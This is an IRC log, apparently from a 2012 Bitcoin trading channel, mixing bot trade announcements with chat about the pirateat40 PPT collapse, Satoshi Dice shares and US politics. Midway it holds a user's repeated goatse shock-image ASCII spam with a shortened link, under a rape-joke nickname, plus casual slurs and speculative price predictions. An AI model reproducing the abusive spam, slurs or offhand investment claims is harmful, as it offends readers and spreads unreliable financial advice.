28 20:51:26 and he's absent. Aug 28 20:51:26 lol Aug 28 20:51:27 i know i can only play a little carcassi Aug 28 20:51:31 I'm not trolling! Aug 28 20:51:37 guitarlessons would help Aug 28 20:51:46 and at least my reals have infinite precision Aug 28 20:51:47 unlike yours Aug 28 20:52:11 i can play this: http://www.youtube.com/watch?v=fnGoHClRN0U Aug 28 20:52:17 [GLBSE] [PPT.DIV] 5 @ 0.049 = 0.245 BTC [+] Aug 28 20:52:17 lol Aug 28 20:52:18 [GLBSE] [PPT.DIV] 6 @ 0.05 = 0.3 BTC [+] Aug 28 20:52:35 that thing is fucking beautiful Aug 28 20:52:37 you don't have enough css in you to be better than me Aug 28 20:52:41 a5m0 abracadabra aethero agath andrew_wmf apumpkin area assbot Asunder8 Azelphur Aug 28 20:52:42 I can play this: http://www.youtube.com/watch?v=GOe670xcKhk Aug 28 20:52:48 apumpkin when you play it or in general ? :D Aug 28 20:53:10 mircea_popescu: to me, both Aug 28 20:53:13 haha Aug 28 20:54:10 jesus copumpkin really? Aug 28 20:54:13 yup Aug 28 20:54:19 nice Aug 28 20:54:28 I learned it in high school when I was sulking over getting dumped :P Aug 28 20:54:40 not as well as she can, obviously Aug 28 20:55:44 [GLBSE] [PPT.DIV] 80 @ 0.025 = 2 BTC [-] Aug 28 20:55:46 [GLBSE] [PPT.DIV] 20 @ 0.00022 = 0.0044 BTC [-] Aug 28 20:55:59 Well that was the last leg of PPT.DIV Aug 28 20:56:47 Who had still bids for PPT.DIV? Aug 28 20:57:33 A lot of people doesn't have a clue... Aug 28 20:57:44 It takes a lot to understand Bitcoin. Aug 28 20:57:49 Yet we still have our retards. Aug 28 20:59:18 i'm not so sure it was ever a 'smart' thing to buy into a ppt Aug 28 20:59:55 ahaha you got dumped by a musician chick ?! Aug 28 21:00:11 No, but buying into the profits of a ppt operation after the whole operations is busted... Aug 28 21:00:23 rdponticelli why won't you have hope. Aug 28 21:00:24 That's a lot less than smart Aug 28 21:00:40 wow, people did that? Aug 28 21:01:00 They're still buying ppt.div Aug 28 21:01:27 [GLBSE] [YARR] 12 @ 0.99999998 = 12 BTC [+] Aug 28 21:01:29 [GLBSE] [YARR] 26 @ 0.99999999 = 26 BTC [+] Aug 28 21:01:31 [GLBSE] [YARR] 2 @ 1 = 2 BTC [+] Aug 28 21:01:43 Ha! killed the panickers Aug 28 21:01:46 finally Aug 28 21:02:00 I am the master of the seven seas Aug 28 21:02:04 I am the lord of trading Aug 28 21:02:09 lol Aug 28 21:02:14 heh Aug 28 21:02:20 the sultan of swing eh ? Aug 28 21:02:47 [GLBSE] [GIGAMINING] 1 @ 0.94389 BTC [+] Aug 28 21:02:53 the tentacle of grape. Aug 28 21:03:11 don't get graped in the mouth by pirate Aug 28 21:03:26 lol, got slapped for claiming to master TheSeven :D Aug 28 21:04:21 I am master of the seven harlots Aug 28 21:04:45 Ron Paul just ran a lap around the RNC Aug 28 21:04:53 his delegate are rioting lol Aug 28 21:04:57 delegates* Aug 28 21:05:06 EmanuelDeOrtego: is this on the internet? Aug 28 21:05:15 let me get it Aug 28 21:05:54 Apparently that was breaking on radio Aug 28 21:05:55 http://www.boston.com/2012/08/27/paul-delegates-mounting-floor-fight-over-new-rules/fR0wAIYu1nhg6EwiTVYSpO/story.html Aug 28 21:06:00 That's all I have for now Aug 28 21:06:06 http://imgur.com/uQYp5 Aug 28 21:07:59 [GLBSE] [ASICMINER] 37 @ 0.1099 = 4.0663 BTC [+] Aug 28 21:08:00 so i tune in and see a jew calling on god setup to look like a nazi Aug 28 21:08:00 [GLBSE] [ASICMINER] 13 @ 0.11 = 1.43 BTC [+] Aug 28 21:08:13 the rnc is awesome Aug 28 21:08:27 [GLBSE] [ASICMINER] 5 @ 0.11 = 0.55 BTC [+] Aug 28 21:10:05 [GLBSE] [OBSI.HRPT] 1 @ 0.104 BTC [-] Aug 28 21:10:07 [GLBSE] [OBSI.HRPT] 1 @ 0.1030011 BTC [-] Aug 28 21:10:33 [GLBSE] [OBSI.HRPT] 8 @ 0.103 = 0.824 BTC [-] Aug 28 21:12:34 Yep, the Ron Paul delegates are tearing the Republican party a new one. Aug 28 21:12:37 It needed to done. Aug 28 21:12:42 haha cool. Aug 28 21:12:48 [MPEX] [S.DICE] 400000 @ 0.003345 = 1338 BTC [-] Aug 28 21:12:51 I hope the party is gone after this. Aug 28 21:13:18 mmm Aug 28 21:13:41 the us needs like 4-5 parties Aug 28 21:13:49 this two party bs is ... bs. Aug 28 21:14:36 It's a system that's easy to control Aug 28 21:14:45 not by the voters. Aug 28 21:14:52 Ha and that's the problem. Aug 28 21:16:38 [MPEX] [S.MPOE] 42000 @ 0.00039217 = 16.4711 BTC [-] Aug 28 21:20:27 [MPEX] [S.DICE] 4200 @ 0.0034 = 14.28 BTC [+] Aug 28 21:21:41 sweet tunes from the rnc Aug 28 21:22:50 [GLBSE] [YABMC] 2 @ 0.1389 = 0.2778 BTC [+] Aug 28 21:24:39 [MPEX] [S.MPOE] 17900 @ 0.00039217 = 7.0198 BTC [-] Aug 28 21:26:37 what is with all the voting talk Aug 28 21:26:43 i thought that was in november Aug 28 21:26:58 it's a long process Aug 28 21:27:19 oh it is the primaries Aug 28 21:27:24 iirc, technically, this convention could nominate someone else Aug 28 21:27:27 naw Aug 28 21:27:34 it's the republican convention Aug 28 21:27:35 i think local/city stuff is happening also Aug 28 21:27:42 maybe that is what it is Aug 28 21:27:48 yeah, local stuff happens often Aug 28 21:27:55 that's what it is Aug 28 21:28:04 i've been seeing people standing outside and stuff Aug 28 21:28:11 i got confused for a moment Aug 28 21:28:12 lol Aug 28 21:28:14 texas Aug 28 21:28:22 they showed up in a uniform Aug 28 21:28:38 a texas flag shirt and stedsons(sp?) Aug 28 21:28:55 stetson Aug 28 21:28:57 stetson ? Aug 28 21:28:57 ta Aug 28 21:29:15 and jeans Aug 28 21:29:44 [GLBSE] [LTC-MINING] 2 @ 0.59 = 1.18 BTC [+] Aug 28 21:32:59 [MPEX] [S.MPOE] 26394 @ 0.00039004 = 10.2947 BTC [-] Aug 28 21:33:42 [GLBSE] [FPGAMINING] 4 @ 0.8401 = 3.3604 BTC [+] Aug 28 21:34:00 [GLBSE] [FPGAMINING] 25 @ 0.84 = 21 BTC [-] Aug 28 21:34:02 [GLBSE] [FPGAMINING] 2 @ 0.83911 = 1.6782 BTC [-] Aug 28 21:34:05 [GLBSE] [FPGAMINING] 4 @ 0.83900001 = 3.356 BTC [-] Aug 28 21:34:09 lol, gotta love some of these speaches, take at their content, these people support ron paul, but then they say elect romney Aug 28 21:34:30 politics is odd Aug 28 21:34:40 in 'merica Aug 28 21:35:20 he has spoken again Aug 28 21:35:27 who? Aug 28 21:35:41 i'm thinking of getting real crazy and buying up toxic glbse bonds Aug 28 21:35:46 you know who Aug 28 21:36:15 ...... um .. . pirate? Aug 28 21:36:40 that guy Aug 28 21:37:10 either that, or you are a charismatic christian claiming, "he is risen" Aug 28 21:37:41 he, who is him Aug 28 21:38:43 he is the narcoleptic charasimatic christian from the sapranos. the writers must've had fun with that one Aug 28 21:39:02 [MPEX] [S.MPOE] 206 @ 0.00039004 = 0.0803 BTC [-] Aug 28 21:39:04 [MPEX] [S.MPOE] 46326 @ 0.00038893 = 18.0176 BTC [-] Aug 28 21:39:22 also i just love the consonance of 'charismatic christian claiming', it subtley evokes a connection the the KKK Aug 28 21:39:57 i hear it too Aug 28 21:41:55 jcpham well at 1 cent to the dollar it might not do any harm anyay Aug 28 21:42:05 buy the entire guy's issuance out of poker night money. Aug 28 21:42:38 i spent the poker winnings on hookers and blow already Aug 28 21:43:42 hookers and blow is so last season Aug 28 21:43:47 harlots and brew is where it's at now. Aug 28 21:43:54 damn, the tampa mayor sounded like a fascist Aug 28 21:44:00 i didn't expect that Aug 28 21:44:05 [MPEX] [S.MPOE] 200 @ 0.0003865 = 0.0773 BTC [-] Aug 28 21:44:07 [MPEX] [S.MPOE] 9992 @ 0.0003862 = 3.8589 BTC [-] Aug 28 21:44:08 [MPEX] [S.MPOE] 11326 @ 0.0003859 = 4.3707 BTC [-] Aug 28 21:44:09 [MPEX] [S.MPOE] 3989 @ 0.00038585 = 1.5392 BTC [-] Aug 28 21:44:53 he basically said that he has an army setup to ensure that the convention goes smoothly too Aug 28 21:48:53 Tampa is a dump in general Aug 28 21:49:02 Florida as well Aug 28 21:49:26 Tampa has Bern's steakhouse Aug 28 21:49:42 main redeeming factor Aug 28 21:50:11 you have steaks on planet sputnik ?! Aug 28 21:50:30 lolwut? how is the republican convention part of the teh democratic process? it's a bunchof representitives! Aug 28 21:50:33 Pirate said something somewhere jcpham? Aug 28 21:50:49 what was the glbse asset for in gpumax yes Aug 28 21:50:57 what the crap Aug 28 21:51:09 holy run on sentence Aug 28 21:51:28 there's a glbse asset for gpumax? Aug 28 21:51:38 gpumax still exists ?! Aug 28 21:51:47 there's no glbse asset for gpumax Aug 28 21:51:49 yeah and still paying out too Aug 28 21:52:02 yeah he was saying payments were going out at midnight today Aug 28 21:52:10 still have purchases in the system to run Aug 28 21:52:26 Where did he mention that? Aug 28 21:52:49 i don't see why it still would run, no more coins to launder. Aug 28 21:52:57 Hey guys, payments will go out at midnight for all the purchases run up till today. We are trying to get all the purchases out of the system that need to be run. If you have a purchase pending or paused please contact us at support@gpumax.com so we can investigate it or issue a refund. Thanks. Aug 28 21:53:08 i went to a decent dueling piano dive in florida once, but i was drunk, so it may not have been all that good Aug 28 21:53:20 Oh, for gpumax Aug 28 21:53:29 our questions alll questioned the wording "need" Aug 28 21:53:32 Cause we have a ton of pending purchases with either bad pool info or issues with missing tiny amounts of payment. Aug 28 22:01:18 thanks for that jcpham Aug 28 22:01:27 sure thing Aug 28 22:01:30 had posted in #gpumax and wasn't sure what was going on Aug 28 22:01:50 my bad i see now Aug 28 22:01:56 the goatse turned me off Aug 28 22:02:02 ;) Aug 28 22:04:48 [MPEX] [S.MPOE] 27187 @ 0.00038585 = 10.4901 BTC [-] Aug 28 22:04:50 [MPEX] [S.MPOE] 2800 @ 0.00038537 = 1.079 BTC [-] Aug 28 22:04:51 [MPEX] [S.MPOE] 8974 @ 0.00038431 = 3.4488 BTC [-] Aug 28 22:06:14 [MPEX] [F.GIGA.ETF] 10644 @ 0.00096687 = 10.2914 BTC [+] Aug 28 22:08:20 what is the name of the glbse asset smickles Aug 28 22:08:23 the mpex one Aug 28 22:09:01 mpoe.etf? Aug 28 22:12:45 [GLBSE] [BDT] 10 @ 1.04999999 = 10.5 BTC [+] Aug 28 22:14:03 [GLBSE] [BDT] 3 @ 1.04999999 = 3.15 BTC [+] Aug 28 22:14:07 [GLBSE] [BDT] 7 @ 1.05 = 7.35 BTC [+] Aug 28 22:14:57 [GLBSE] [BIF.5-10.MININGBOND] 40 @ 0.7 = 28 BTC [+] Aug 28 22:16:43 -buttrapedat40- * \ \_-~ ~-_\ | * http://goo.gl/vOslB Aug 28 22:16:43 -buttrapedat40- g \_ \ _.--------.______\| | g http://goo.gl/vOslB Aug 28 22:16:43 -buttrapedat40- o \ \______// _ ___ _ (_(__> \ | o http://goo.gl/vOslB Aug 28 22:16:43 -buttrapedat40- a \ . C ___) ______ (_(____> | / a http://goo.gl/vOslB Aug 28 22:16:43 -buttrapedat40- t /\ | C ____)/ \ (_____> |_/ t http://goo.gl/vOslB Aug 28 22:16:44 -buttrapedat40- s / /\| C_____) | (___> / \ s http://goo.gl/vOslB Aug 28 22:16:46 -buttrapedat40- e | ( _C_____)\______/ // _/ / \ e http://goo.gl/vOslB Aug 28 22:16:48 -buttrapedat40- * | \ |__ \\_________// (__/ | * http://goo.gl/vOslB Aug 28 22:16:50 -buttrapedat40- g | \ \____) `---- --' | g http://goo.gl/vOslB Aug 28 22:16:52 -buttrapedat40- o | \_ ___\ /_ _/ | o http://goo.gl/vOslB Aug 28 22:16:54 -buttrapedat40- a | / | | \ | a http://goo.gl/vOslB Aug 28 22:16:56 -buttrapedat40- t | | / \ \ | t http://goo.gl/vOslB Aug 28 22:17:00 lol Aug 28 22:17:07 PsychoticBoy: good job Aug 28 22:17:15 kakobrekla: you need more ops in here :P Aug 28 22:17:32 meh. kinda stupid. Aug 28 22:17:39 weren't you trying to get some fund going PsychoticBoy ? Aug 28 22:17:46 no, i like drama. Aug 28 22:17:49 yep Aug 28 22:17:53 kakobrekla: alright Aug 28 22:17:56 why Aug 28 22:18:09 [GLBSE] [BITBOND] 1 @ 0.46 BTC [-] Aug 28 22:18:12 bad approach. Aug 28 22:18:18 America was never Democratic Aug 28 22:18:25 Sorry Aug 28 22:18:31 that was typed in my field Aug 28 22:18:38 what you mean mircea? Aug 28 22:18:48 for the record, nano was given op rights just the other day Aug 28 22:18:57 PsychoticBoy i mean, dun be spamming irc. Aug 28 22:19:08 I dont spam Aug 28 22:19:22 so if you think im mis-judging, bug him as well Aug 28 22:20:07 "buttrapedat40" I lol'd Aug 28 22:20:37 [MPEX] [S.MPOE] 30026 @ 0.00038431 = 11.5393 BTC [-] Aug 28 22:20:39 [MPEX] [S.MPOE] 13311 @ 0.00038422 = 5.1144 BTC [-] Aug 28 22:20:50 I dont like pirateat40 and his fooling around Aug 28 22:21:08 so you spam an unrelated channel with unpleasant imagery? Aug 28 22:21:09 good job Aug 28 22:21:58 1 image isnt spamming, I was reacting at jcpham`s conversation Aug 28 22:22:16 jcpham: mpoe.etf is the mpex fund on glbs Aug 28 22:22:21 1 image repeated 20 times or so? Aug 28 22:22:22 just... you know... put it in a pastebin and link us. Aug 28 22:22:24 [GLBSE] [ASICMINER] 25 @ 0.115 = 2.875 BTC [+] Aug 28 22:22:32 one would have been enough Aug 28 22:22:33 when? Aug 28 22:22:56 when what Aug 28 22:23:25 when was I spamming? only 5 min ago 1 image Aug 28 22:24:07 me and my big mouth ;) Aug 28 22:24:16 http://shrani.si/f/3x/Lm/1JstYDwZ/asciifailspam.png Aug 28 22:24:58 yep that was 1 time and 1 time only Aug 28 22:25:28 ok now I know image posting is considered as spam Aug 28 22:25:39 i like kakobrekla's terminal Aug 28 22:25:40 no more images then Aug 28 22:25:54 good idea. Aug 28 22:26:04 thanks, no prob Aug 28 22:26:36 and to celebrate, http://polimedia.us/dtng/c/src/134618198144.jpg Aug 28 22:26:50 When did Bitcointalk become all anarcho-capitalists? Aug 28 22:27:06 i apologize if i brought it here Aug 28 22:27:14 i thought everyone knew what i was talking about Aug 28 22:27:15 well the only commie is now here EmanuelDeOrtego Aug 28 22:27:35 why am i looking at this porn Aug 28 22:27:47 dopamine addiction Aug 28 22:27:52 lol Aug 28 22:28:04 EmanuelDeOrtego you enjoy watching the suffering of others ? Aug 28 22:28:54 [GLBSE] [BBBB] 250 @ 0.00025 = 0.0625 BTC [-] Aug 28 22:31:36 [GLBSE] [ASICMINER] 1 @ 0.1149 BTC [-] Aug 28 22:35:10 [MPEX] [S.MPOE] 200 @ 0.00038646 = 0.0773 BTC [+] Aug 28 22:35:12 [MPEX] [S.MPOE] 7268 @ 0.00038743 = 2.8158 BTC [+] Aug 28 22:38:25 [GLBSE] [ASICMINER] 20 @ 0.1149 = 2.298 BTC [-] Aug 28 22:39:50 [GLBSE] [MPOE.ETF] 5 @ 1.4 = 7 BTC [+] Aug 28 22:42:44 [GLBSE] [BIB.PIRATE] 4 @ 0.2097 = 0.8388 BTC [+] Aug 28 22:43:17 [GLBSE] [ASICMINER] 6 @ 0.1149 = 0.6894 BTC [-] Aug 28 22:43:22 [MPEX] [S.MPOE] 15986 @ 0.00039042 = 6.2413 BTC [+] Aug 28 22:44:16 [GLBSE] [GIPPT] 2 @ 0.6 = 1.2 BTC [-] Aug 28 22:44:18 [GLBSE] [YABMC] 10 @ 0.1379 = 1.379 BTC [-] Aug 28 22:44:56 [GLBSE] [ASICMINER] 10 @ 0.1149 = 1.149 BTC [-] Aug 28 22:47:06 [MPEX] [F.GIGA.ETF] 5658 @ 0.00096354 = 5.4517 BTC [-] Aug 28 22:47:07 [MPEX] [F.GIGA.ETF] 1543 @ 0.00096016 = 1.4815 BTC [-] Aug 28 22:47:09 [GLBSE] [NYAN.C] 4 @ 0.55 = 2.2 BTC [-] Aug 28 22:49:03 [GLBSE] [BIB.PIRATE] 4 @ 0.2098 = 0.8392 BTC [+] Aug 28 22:49:41 [GLBSE] [BIB.PIRATE] 4 @ 0.2097 = 0.8388 BTC [-] Aug 28 22:50:31 [GLBSE] [GSDPT] 20 @ 0.0034 = 0.068 BTC [+] Aug 28 22:54:24 [GLBSE] [BIB.PIRATE] 2 @ 0.2097 = 0.4194 BTC [-] Aug 28 22:56:42 [MPEX] [S.MPOE] 7740 @ 0.00039492 = 3.0567 BTC [+] Aug 28 22:56:44 [MPEX] [S.MPOE] 4942 @ 0.0003952 = 1.9531 BTC [+] Aug 28 22:56:45 [MPEX] [S.MPOE] 13718 @ 0.00039585 = 5.4303 BTC [+] Aug 28 23:00:43 [MPEX] [F.GIGA.ETF] 15000 @ 0.00094917 = 14.2376 BTC [-] Aug 28 23:00:44 [MPEX] [F.GIGA.ETF] 4400 @ 0.00095017 = 4.1807 BTC [+] Aug 28 23:01:18 [MPEX] [F.GIGA.ETF] 3900 @ 0.00093667 = 3.653 BTC [-] Aug 28 23:01:49 [GLBSE] [BIF.BTCST.PPT] 1 @ 0.14 BTC [-] Aug 28 23:02:39 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2003 BTC [-] Aug 28 23:02:57 [GLBSE] [TYGRR.BOND-P] 3 @ 0.2002 = 0.6006 BTC [-] Aug 28 23:13:48 [MPEX] [S.MPOE] 6582 @ 0.00039585 = 2.6055 BTC [+] Aug 28 23:13:49 [MPEX] [S.MPOE] 28518 @ 0.00039592 = 11.2908 BTC [+] Aug 28 23:17:41 [GLBSE] [PPT.B] 12 @ 0.45 = 5.4 BTC [-] Aug 28 23:18:32 [GLBSE] [PPT.A] 10 @ 0.45 = 4.5 BTC [+] Aug 28 23:20:06 [GLBSE] [PPT.E] 2 @ 0.55 = 1.1 BTC [+] Aug 28 23:20:10 [GLBSE] [HYDRO.BONDS] 5 @ 1.59 = 7.95 BTC [+] Aug 28 23:20:12 [GLBSE] [HYDRO.BONDS] 4 @ 1.6 = 6.4 BTC [+] Aug 28 23:21:28 [MPEX] [S.MPOE] 11276 @ 0.00039451 = 4.4485 BTC [-] Aug 28 23:29:43 [GLBSE] [GSDPT] 1000 @ 0.0033 = 3.3 BTC [-] Aug 28 23:30:23 [GLBSE] [GSDPT] 51 @ 0.0033 = 0.1683 BTC [-] Aug 28 23:32:10 [GLBSE] [ASICMINER] 1 @ 0.11489 BTC [-] Aug 28 23:32:53 [GLBSE] [BITCOINMINV] 4 @ 0.139 = 0.556 BTC [-] Aug 28 23:33:33 [GLBSE] [TYGRR.BOND-P] 3 @ 0.24 = 0.72 BTC [+] Aug 28 23:33:35 [GLBSE] [TYGRR.BOND-P] 10 @ 0.245 = 2.45 BTC [+] Aug 28 23:33:38 [GLBSE] [TYGRR.BOND-P] 7 @ 0.2499 = 1.7493 BTC [+] Aug 28 23:33:53 I'm selling my Satoshi Dice for .0033 Aug 28 23:36:50 EmanuelDeOrtego: do you plan to buy at a lower price? Aug 28 23:37:28 I am just uncertain. Aug 28 23:37:30 [MPEX] [F.GIGA.ETF] 8740 @ 0.00095017 = 8.3045 BTC [+] Aug 28 23:37:34 It's not selling like I want it o Aug 28 23:37:37 to* Aug 28 23:37:37 [GLBSE] [DMC] 65 @ 0.06 = 3.9 BTC [-] Aug 28 23:37:59 If it rallies, that's great. Aug 28 23:38:10 I just don't believe in it quite yet. Aug 28 23:39:32 !ticker s.dice Aug 28 23:39:33 [MPEX:S.DICE] 1day: 0.0033 / 0.00334643 / 0.0034 (412358 shares, 1,379.93 BTC), 30day: 0.0032 / 0.00324614 / 0.0034 (2762263 shares, 8,966.71 BTC) Aug 28 23:39:49 2.7 out of 10 eh? Aug 28 23:40:09 O_o what a name Aug 28 23:40:42 EmanuelDeOrtego, I'd leave it some time, for the first divs + new design to be implemented Aug 28 23:41:12 BTC-Mining: do you have some shares? Aug 28 23:41:26 About 50k Aug 28 23:43:13 s.dice is interesting if nothing else Aug 28 23:43:34 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC [-] Aug 28 23:44:44 still, even at .003~ that around a 19% yeild, and seemingly lower risk than other bitcoin ventures i'm aware of Aug 28 23:44:53 *expected yeild Aug 28 23:45:25 [GLBSE] [GSDPT] 500 @ 0.0032 = 1.6 BTC [-] Aug 28 23:45:45 ;;ticker Aug 28 23:45:45 Best bid: 10.91, Best ask: 10.999, Bid-ask spread: 0.08900, Last trade: 10.999, 24 hour volume: 66047, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 28 23:46:09 With Bitcoin volumes going lower and lower at $20 and below Aug 28 23:46:17 I rather have Bitcoins than Satoshi Dice shares Aug 28 23:46:31 We might be hitting $100+ soon Aug 28 23:46:59 and I don't want to be sitting on Satoshi Dice when that happens Aug 28 23:48:40 isn't being an investor great ? :D Aug 28 23:51:01 It's good until American Banker starts covering Bitcoin Aug 28 23:51:58 [MPEX] [S.MPOE] 19624 @ 0.00039053 = 7.6638 BTC [-] Aug 28 23:54:10 [GLBSE] [BBBB] 10 @ 0.00025 = 0.0025 BTC [-] Aug 28 23:55:22 [GLBSE] [GSDPT] 20 @ 0.0032 = 0.064 BTC [-] Aug 28 23:56:14 Oh god, there goes there "I'm going to buy 60 cents worth of shares" crowd again. Aug 28 23:56:20 the&* Aug 28 23:56:32 *star eyed* if we hit 100 per btc, i'm gonna get drunk Aug 28 23:56:56 [GLBSE] [FOO.PPPPT] 1 @ 0.2797 BTC [+] Aug 28 23:56:58 [GLBSE] [FOO.PPPPT] 9 @ 0.2798 = 2.5182 BTC [+] Aug 28 23:57:16 good old, 'merican style drunk too Aug 28 23:57:29 [GLBSE] [MERGEDMINING] 5 @ 0.081 = 0.405 BTC [-] Aug 28 23:58:42 like i'll need to throw a party as anexcuse Aug 29 00:01:21 We waiting too much to get drunk? Aug 29 00:01:40 Why waiting at all? :) Aug 29 00:03:46 im too lazy to drink. Aug 29 00:04:08 free tix Aug 29 00:04:27 rdponticelli: i'll have a glass of wine, but i'm talking about kegstands at 100 Aug 29 00:04:54 Ok Aug 29 00:05:07 Quality drinkin are you talking about? Aug 29 00:06:11 lol Aug 29 00:06:28 I know what you mean xD Aug 29 00:08:18 [MPEX] [F.GIGA.ETF] 3460 @ 0.00096687 = 3.3454 BTC [+] Aug 29 00:08:19 [MPEX] [F.GIGA.ETF] 2343 @ 0.00096735 = 2.2665 BTC [+] Aug 29 00:08:24 [GLBSE] [BITCOINMINV] 2 @ 0.139 = 0.278 BTC [-] Aug 29 00:08:40 [GLBSE] [BIB.PIRATE] 2 @ 0.2097 = 0.4194 BTC [-] Aug 29 00:08:42 [GLBSE] [BIB.PIRATE] 42 @ 0.2098 = 8.8116 BTC [+] Aug 29 00:09:33 [GLBSE] [TYGRR.BOND-P] 8 @ 0.2499 = 1.9992 BTC [+] Aug 29 00:10:46 [GLBSE] [FOO.PPPPT] 15 @ 0.2798 = 4.197 BTC [+] Aug 29 00:13:31 [GLBSE] [OBSI.HRPT] 5 @ 0.105 = 0.525 BTC [+] Aug 29 00:16:07 [GLBSE] [OBSI.HRPT] 4 @ 0.1053 = 0.4212 BTC [+] Aug 29 00:16:19 [GLBSE] [BITCOINMINV] 2 @ 0.139 = 0.278 BTC [-] Aug 29 00:16:21 [GLBSE] [HYDRO.BONDS] 2 @ 1.6 = 3.2 BTC [+] Aug 29 00:18:15 [GLBSE] [GSDPT] 15 @ 0.0032 = 0.048 BTC [-] Aug 29 00:18:17 EmanuelDeOrtego, you got competition https://bitcointalk.org/index.php?topic=104177.0 Aug 29 00:18:35 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2003 BTC [-] Aug 29 00:18:36 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2002 BTC [-] Aug 29 00:19:41 [GLBSE] [ASICMINER] 1 @ 0.11489 BTC [-] Aug 29 00:19:43 [GLBSE] [ASICMINER] 6 @ 0.1149 = 0.6894 BTC [+] Aug 29 00:20:16 [GLBSE] [GMVT-BOT] 3 @ 0.1798 = 0.5394 BTC [+] Aug 29 00:21:23 [GLBSE] [FOO.PPPPT] 12 @ 0.2798 = 3.3576 BTC [+] Aug 29 00:23:34 [GLBSE] [BITCOINMINV] 1 @ 0.139 BTC [-] Aug 29 00:27:48 [MPEX] [S.DICE] 5500 @ 0.0034 = 18.7 BTC [+] Aug 29 00:30:02 [GLBSE] [OBSI.HRPT] 3 @ 0.1053 = 0.3159 BTC [+] Aug 29 00:32:42 [MPEX] [F.GIGA.ETF] 5960 @ 0.00096679 = 5.7621 BTC [-] Aug 29 00:32:44 [MPEX] [F.GIGA.ETF] 8140 @ 0.00093667 = 7.6245 BTC [-] Aug 29 00:38:38 any ideas what this is all about? " Notice: If you are a PPT operator please contact me via PM. Thanks" Aug 29 00:39:29 EskimoBob: nope Aug 29 00:39:37 could be good, could be bad Aug 29 00:40:09 hoping the former Aug 29 00:40:10 He said I am not eligible because I only had a sub account and goat's PPT Aug 29 00:40:35 Doesn't matter really, I bought back almosy 2000 shares of yarr with my own money Aug 29 00:40:42 Goats PPT is eligible? Aug 29 00:40:54 Goat is eligible, because he had a direct account Aug 29 00:41:02 But, eligible for what --> dunno Aug 29 00:41:51 Interesting for sure Aug 29 00:42:05 [GLBSE] [ASICMINER] 37 @ 0.1149 = 4.2513 BTC [+] Aug 29 00:42:07 [GLBSE] [ASICMINER] 25 @ 0.115 = 2.875 BTC [+] Aug 29 00:42:08 [GLBSE] [ASICMINER] 7 @ 0.119 = 0.833 BTC [+] Aug 29 00:42:09 [GLBSE] [ASICMINER] 73 @ 0.11999 = 8.7593 BTC [+] Aug 29 00:42:10 [GLBSE] [ASICMINER] 50 @ 0.12 = 6 BTC [+] Aug 29 00:42:37 [MPEX] [S.MPOE] 21600 @ 0.00039221 = 8.4717 BTC [+] Aug 29 00:42:39 [GLBSE] [FOO.PPPPT] 14 @ 0.2798 = 3.9172 BTC [+] Aug 29 00:46:26 TYGRR.BOND-P started to look good at 0.2003 :) Aug 29 00:46:31 or not ... Aug 29 00:46:40 50:50 bet Aug 29 00:47:01 At this point its still a gamble Aug 29 00:47:47 everythin's a gamble. Aug 29 00:48:10 Well ok, not a safe bet then to use better wording. Aug 29 00:48:41 It's not a gamble. Aug 29 00:48:49 Anyone can figure it out :p Aug 29 00:49:14 At least 2 people from bitcointalk already figrued it out. So it is logical to assume they know what position pirate is in as well. Aug 29 00:49:46 What did they figure out? That he trades btc with big players? Aug 29 00:50:20 At a premium. Aug 29 00:50:21 teh good ole' mystery Aug 29 00:51:34 usagi: talk :) Aug 29 00:51:45 enlighten us Aug 29 00:51:47 there's no incentive to talk Aug 29 00:51:55 everything is void. Aug 29 00:52:10 if you can see the great void, then you will understand the mystery. Aug 29 00:52:15 Haha, I was more just curious if you read something I didnt Aug 29 00:52:34 [GLBSE] [BIB.PIRATE] 6 @ 0.3 = 1.8 BTC [+] Aug 29 00:53:46 whats next usagi? Are you going to ask: "what is the sound of one hand clapping"? Aug 29 00:53:59 That wouldn't make sense. Aug 29 00:54:01 you can't clap with one hand? Aug 29 00:54:19 [MPEX] [S.MPOE] 37400 @ 0.00039233 = 14.6731 BTC [+] Aug 29 00:54:20 [MPEX] [S.MPOE] 800 @ 0.00039221 = 0.3138 BTC [-] Aug 29 00:54:22 [MPEX] [S.MPOE] 22476 @ 0.00039202 = 8.811 BTC [-] Aug 29 00:55:17 it will, if you figure it out. Then you will understand the mystery of the soundless sound Aug 29 00:55:29 blaa blaa blaa Aug 29 00:55:46 so the entire thing veers towards the ezoteric nao ? Aug 29 00:57:22 [GLBSE] [RSM] 1 @ 0.2999 BTC [-] Aug 29 00:59:28 [GLBSE] [TYGRR.BOND-P] 1 @ 0.308 BTC [+] Aug 29 01:00:59 All I know is that Pirate is going to have to move states or countries at this rate Aug 29 01:01:25 o no, it will all magically be fixed Aug 29 01:01:26 next week. Aug 29 01:01:49 [MPEX] [S.MPOE] 33800 @ 0.00039035 = 13.1938 BTC [-] Aug 29 01:02:46 If I were Pirate, I would be well-armed right now. The death threats I've seen were creepy as hell. Aug 29 01:02:58 urlpls? Aug 29 01:03:07 Deleted by Theymos obviously Aug 29 01:03:51 they should have been pastebined. Aug 29 01:12:27 [GLBSE] [ASICMINER] 36 @ 0.1101 = 3.9636 BTC [-] Aug 29 01:12:28 [GLBSE] [ASICMINER] 40 @ 0.11 = 4.4 BTC [-] Aug 29 01:12:29 [GLBSE] [ASICMINER] 10 @ 0.11 = 1.1 BTC [-] Aug 29 01:12:38 [GLBSE] [GSDPT] 18 @ 0.0032 = 0.0576 BTC [-] Aug 29 01:13:06 streisand effect fail. Aug 29 01:13:18 o theres pirate 'news' Aug 29 01:14:04 >><@pirateat40> Notice: If you are a PPT operator please contact me via PM. Thanks Aug 29 01:21:55 [MPEX] [F.GIGA.ETF] 6057 @ 0.00096735 = 5.8592 BTC [+] Aug 29 01:21:57 [MPEX] [F.GIGA.ETF] 5163 @ 0.00096864 = 5.0011 BTC [+] Aug 29 01:21:58 [MPEX] [F.GIGA.ETF] 4280 @ 0.0009692 = 4.1482 BTC [+] Aug 29 01:24:00 [GLBSE] [TYGRR.BOND-P] 2 @ 0.3199 = 0.6398 BTC [+] Aug 29 01:24:28 [GLBSE] [BIB.PIRATE] 10 @ 0.31 = 3.1 BTC [+] Aug 29 01:25:12 [GLBSE] [TYGRR.BOND-P] 40 @ 0.32 = 12.8 BTC [+] Aug 29 01:27:25 [GLBSE] [GREEN] 6 @ 0.05 = 0.3 BTC [-] Aug 29 01:27:55 [GLBSE] [TYGRR.BOND-P] 25 @ 0.32 = 8 BTC 